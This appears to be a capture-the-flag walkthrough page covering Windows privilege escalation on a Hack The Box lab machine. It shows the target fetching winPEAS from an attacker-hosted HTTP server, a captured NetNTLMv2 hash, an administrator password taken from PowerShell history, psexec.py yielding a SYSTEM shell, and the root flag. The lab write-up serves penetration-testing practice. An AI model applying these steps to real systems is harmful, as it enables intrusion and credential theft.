PSEXEC.PY

IDENTIFY PRIVESC VULNERABILITIES (WINPEAS)

root@htb:~$ BROWSER > https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
 
 * place the raw executable in ~/Downloads
 
root@htb:~$ sudo python3 -m http.server 8080
 
C:\target> powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
 powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe

C:\Users\sql_svc\Downloads>dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\Downloads

  03/08/2025  08:54 AM    <DIR>          .
  03/08/2025  08:54 AM    <DIR>          ..
  03/08/2025  07:12 AM            45,272 nc64.exe
  03/08/2025  08:54 AM         1,930,752 winPEASx64.exe
               2 File(s)      1,976,024 bytes
               2 Dir(s)  10,714,357,760 bytes free


C:\target> powershell -c C:\Users\sql_svc\Downloads\winPEASx64.exe
 ���������� Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    sql_svc::ARCHETYPE:1122334455667788:cc329849205c1f61e52fdc19e00aaccc:01010000000000002b788e114b90db014f2d23496717becc000000000800300030000000000000000000000000300000f11c34cbf3b69a899ead4a6e45502bc55e34a586839efe4a44845307169f1c090a00100000000000000000000000000000000000090000000000000000000000

 ...
 ���������� PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 79B
 ...
 ���������� Current Token privileges
 � Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
    SeAssignPrimaryTokenPrivilege: DISABLED
    SeIncreaseQuotaPrivilege: DISABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: DISABLED
 ...
 ���������� Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    C:\Users\Default\NTUSER.DAT
    C:\Users\sql_svc\NTUSER.DAT
 ...
 
 * can target SeImpersonatePrivilege
 
C:\target> dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

 01/20/2020  05:04 AM    <DIR>          .
 01/20/2020  05:04 AM    <DIR>          ..
 03/17/2020  01:36 AM                79 ConsoleHost_history.txt
               1 File(s)             79 bytes
               2 Dir(s)  10,713,939,968 bytes free
 
C:\target> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
 exit

ESCALATE PRIVS W/ PSEXEC

#escalate privileges
root@htb:~$ python3 psexec.py administrator@{TARGET_IP}
 Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies 

 Password: MEGACORP_4dm1n!!
 
 [*] Requesting shares on 10.129.241.250.....
 [*] Found writable share ADMIN$
 [*] Uploading file yQzLFkqG.exe
 [*] Opening SVCManager on 10.129.241.250.....
 [*] Creating service pQUO on 10.129.241.250.....
 [*] Starting service pQUO.....
 [!] Press help for extra shell commands
 Microsoft Windows [Version 10.0.17763.2061]
 (c) 2018 Microsoft Corporation. All rights reserved.

 * the password can't be given along with the cmd; it must be supplied afterward

C:\Windows\system32> whoami
  nt authority\system
 
C:\Windows\system32> cd c:\users
C:\Users> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of c:\Users

 01/19/2020  03:10 PM    <DIR>          .
 01/19/2020  03:10 PM    <DIR>          ..
 01/19/2020  10:39 PM    <DIR>          Administrator
 01/19/2020  10:39 PM    <DIR>          Public
 01/20/2020  05:01 AM    <DIR>          sql_svc
               0 File(s)              0 bytes
               5 Dir(s)  10,695,737,344 bytes free

C:\Windows\Users> cd c:\users\Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of c:\Users\Administrator\Desktop

 07/27/2021  01:30 AM    <DIR>          .
 07/27/2021  01:30 AM    <DIR>          ..
 02/25/2020  06:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,695,774,208 bytes free
       
C:\Users\Administrator\Desktop> type root.txt
 b91ccec3305e98240082d4474b848528

PreviousPRIVILEGE ESCALATION NextHARDCODED CREDENTIALS

Last updated 1 month ago